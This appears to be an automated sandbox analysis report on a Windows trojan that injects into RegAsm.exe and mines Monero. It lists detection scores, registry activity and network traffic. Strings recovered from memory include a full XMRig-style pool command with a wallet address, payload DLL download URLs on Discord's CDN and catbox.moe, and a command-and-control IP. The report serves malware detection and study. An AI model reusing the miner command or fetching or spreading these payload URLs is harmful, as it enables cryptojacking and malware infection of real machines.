                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeReversingLabs: Detection: 44%
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeReversingLabs: Detection: 44%
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeVirustotal: Detection: 55%Perma Link
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeJoe Sandbox ML: detected
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeJoe Sandbox ML: detected

                      Bitcoin Miner

                      barindex
                      Source: Yara matchFile source: 00000004.00000002.4115219254.000001DC43F58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.4112743576.000001DC42495000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.4115219254.000001DC43F8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7008, type: MEMORYSTR
                      Source: RegAsm.exe, 00000004.00000002.4115219254.000001DC43F58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: -o stratum+ssl://pool.supportxmr.com:443 -u 42uWctV1usG39y3ctaQfaggdnRyDtMPXkSoK3xJUcroCJmdwzVLEZt8cdopiqqqZs7E1TdnbyeAZcUzpaVYpXmcD6Pfw7RT.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
                      Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49732 version: TLS 1.2
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC106DB000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1681802941.000001FC71D90000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC10753000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000003.00000002.1723437634.000001B0CAD17000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC106DB000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1681802941.000001FC71D90000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC10753000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000003.00000002.1723437634.000001B0CAD17000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC10306000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC105D6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1681644399.000001FC71D40000.00000004.08000000.00040000.00000000.sdmp, Target.exe, 00000003.00000002.1723437634.000001B0CAD17000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000003.00000002.1723437634.000001B0CACC7000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000009.00000002.2232552237.000001F50E018000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC10306000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC105D6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1681644399.000001FC71D40000.00000004.08000000.00040000.00000000.sdmp, Target.exe, 00000003.00000002.1723437634.000001B0CAD17000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000003.00000002.1723437634.000001B0CACC7000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000009.00000002.2232552237.000001F50E018000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: global trafficTCP traffic: 192.168.2.4:49730 -> 147.189.173.36:1010
                      Source: global trafficHTTP traffic detected: GET /attachments/1301574231573663746/1301575510102507551/plugin3.dll?ex=6724fa27&is=6723a8a7&hm=de75ef4bcda6b9340b0357973edbc8ae95f493136ccb6eede12840c8370e40e0& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 162.159.135.233 162.159.135.233
                      Source: Joe Sandbox ViewIP Address: 162.159.135.233 162.159.135.233
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49743
                      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49793
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /attachments/1301574231573663746/1301575510102507551/plugin3.dll?ex=6724fa27&is=6723a8a7&hm=de75ef4bcda6b9340b0357973edbc8ae95f493136ccb6eede12840c8370e40e0& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: fla1337.site
                      Source: global trafficDNS traffic detected: DNS query: cdn.discordapp.com
                      Source: powershell.exe, 00000001.00000002.1786095523.000001D13CA5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000001.00000002.1731931353.000001D12CC1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000001.00000002.1803041646.000001D145052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.micO
                      Source: powershell.exe, 00000001.00000002.1731931353.000001D12CC1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1675197443.000001FC00346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1731931353.000001D12C9F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4115219254.000001DC43E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000001.00000002.1731931353.000001D12CC1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 00000001.00000002.1731931353.000001D12CC1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 00000001.00000002.1731931353.000001D12C9F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: RegAsm.exe, 00000004.00000002.4115219254.000001DC43F8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1301574231573663746/1301575510102507551/plugin3.dll?ex=6724fa
                      Source: powershell.exe, 00000001.00000002.1786095523.000001D13CA5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000001.00000002.1786095523.000001D13CA5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000001.00000002.1786095523.000001D13CA5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: RegAsm.exe, 00000004.00000002.4115219254.000001DC43F58000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4115219254.000001DC43F8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/k541xr.dll
                      Source: RegAsm.exe, 00000004.00000002.4115219254.000001DC43F58000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4112743576.000001DC42495000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4115219254.000001DC43F8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/k541xr.dll0
                      Source: RegAsm.exe, 00000004.00000002.4115219254.000001DC43F8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/kwfxr7.dll
                      Source: powershell.exe, 00000001.00000002.1731931353.000001D12CC1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC10306000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC105D6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1681644399.000001FC71D40000.00000004.08000000.00040000.00000000.sdmp, Target.exe, 00000003.00000002.1723437634.000001B0CAD17000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000003.00000002.1723437634.000001B0CACC7000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000009.00000002.2232552237.000001F50E018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC10306000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC105D6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1681644399.000001FC71D40000.00000004.08000000.00040000.00000000.sdmp, Target.exe, 00000003.00000002.1723437634.000001B0CAD17000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000003.00000002.1723437634.000001B0CACC7000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000009.00000002.2232552237.000001F50E018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC10306000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC105D6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1681644399.000001FC71D40000.00000004.08000000.00040000.00000000.sdmp, Target.exe, 00000003.00000002.1723437634.000001B0CAD17000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000003.00000002.1723437634.000001B0CACC7000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000009.00000002.2232552237.000001F50E018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: powershell.exe, 00000001.00000002.1801867950.000001D144F20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.535umer
                      Source: powershell.exe, 00000001.00000002.1786095523.000001D13CA5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC10306000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC105D6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1681644399.000001FC71D40000.00000004.08000000.00040000.00000000.sdmp, Target.exe, 00000003.00000002.1723437634.000001B0CAD17000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000003.00000002.1723437634.000001B0CACC7000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000009.00000002.2232552237.000001F50E018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: Target.exe, 00000009.00000002.2232552237.000001F50E018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC10306000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC105D6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1681644399.000001FC71D40000.00000004.08000000.00040000.00000000.sdmp, Target.exe, 00000003.00000002.1723437634.000001B0CAD17000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000003.00000002.1723437634.000001B0CACC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49732 version: TLS 1.2

                      System Summary

                      barindex
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, Schema.csLarge array initialization: ForgotSchema: array initializer size 673584
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeCode function: 3_2_00007FFD9BA2407D NtUnmapViewOfSection,3_2_00007FFD9BA2407D
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeCode function: 0_2_00007FFD9B8B51830_2_00007FFD9B8B5183
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeCode function: 0_2_00007FFD9B8B1EA80_2_00007FFD9B8B1EA8
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeCode function: 0_2_00007FFD9BA331000_2_00007FFD9BA33100
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeCode function: 0_2_00007FFD9BA3172D0_2_00007FFD9BA3172D
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeCode function: 0_2_00007FFD9BA33E700_2_00007FFD9BA33E70
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeCode function: 0_2_00007FFD9BA32ED00_2_00007FFD9BA32ED0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeCode function: 0_2_00007FFD9BA362D00_2_00007FFD9BA362D0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeCode function: 0_2_00007FFD9BA382A00_2_00007FFD9BA382A0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B9630E91_2_00007FFD9B9630E9
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeCode function: 3_2_00007FFD9B8A51833_2_00007FFD9B8A5183
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeCode function: 3_2_00007FFD9BA200583_2_00007FFD9BA20058
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeCode function: 4_2_00007FFD9B8D09F04_2_00007FFD9B8D09F0
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeCode function: 4_2_00007FFD9B8D3C704_2_00007FFD9B8D3C70
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeCode function: 4_2_00007FFD9B8D88104_2_00007FFD9B8D8810
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeCode function: 4_2_00007FFD9B8D26E04_2_00007FFD9B8D26E0
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeCode function: 4_2_00007FFD9B8F05D24_2_00007FFD9B8F05D2
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeCode function: 4_2_00007FFD9B8DFA894_2_00007FFD9B8DFA89
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeCode function: 4_2_00007FFD9B8D4AD84_2_00007FFD9B8D4AD8
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeCode function: 4_2_00007FFD9B8D32144_2_00007FFD9B8D3214
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeCode function: 4_2_00007FFD9B8EF8264_2_00007FFD9B8EF826
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeCode function: 4_2_00007FFD9B8CD5B84_2_00007FFD9B8CD5B8
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeCode function: 4_2_00007FFD9B8C6A454_2_00007FFD9B8C6A45
